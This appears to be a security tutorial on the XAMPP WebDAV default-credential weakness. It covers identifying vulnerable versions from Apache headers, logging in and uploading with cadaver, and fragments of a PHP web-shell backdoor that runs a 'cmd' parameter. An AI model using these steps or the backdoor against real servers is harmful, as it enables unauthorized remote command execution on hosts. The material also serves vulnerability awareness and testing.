1. download/install cadaver
apt-get install cadaver
2. login to the XAMPP server’s WebDAV folder
cadaver http://<REMOTE HOST>/webdav/
2. upload a file to the webdav folder
4. browse to your uploaded file
load URL, http://<REMOTE HOST>/webdav/helloworld.txt, in browser
Vulnerable software (Windows version) download:
PHP-based payload (acquired from BackTrack 5.1):
<!– Simple PHP backdoor by DK (http://michaeldaw.org) –>
$cmd = ($_REQUEST[‘cmd’]);
<!– http://michaeldaw.org 2006 –>
To identify the version of XAMPP running on a server, you can analyze the HTTP Header response for the apache server. The example below shows the HTTP Header of a server running XAMPP 1.7.3. Take care to notice the version of Apache that was included in this version of XAMPP. You can see that Apache v2.2.14 was joined with XAMPP v1.7.3. You can use this information to help identify what version of XAMPP is running on a given host. If the Apache version is 2.2.14 or below, then the XAMPP version is 1.7.3 or below. And if the XAMPP version is 1.7.3 or below, then the host is possibly vulnerable the WebDAV default credential design vulnerability. And if you find a server running Apache 2.2.14, you will need to determine if XAMPP is installed. You can determine if XAMPP is being used as a hosting solution by checking the XAMPP URL: http://localhost/xampp/. If an HTTP authentication window appears, most likely XAMPP is used on the server.
And once you identify an XAMPP installation of 1.7.3 or below, you can use the commands below in Linux to login and upload a file to the remote server with the default credentials.
To show the potential impact of this design vulnerability, an attacker could use the WebDAV account to upload a php-based payload for remote access to the hosting server. An example of such a payload is shown below.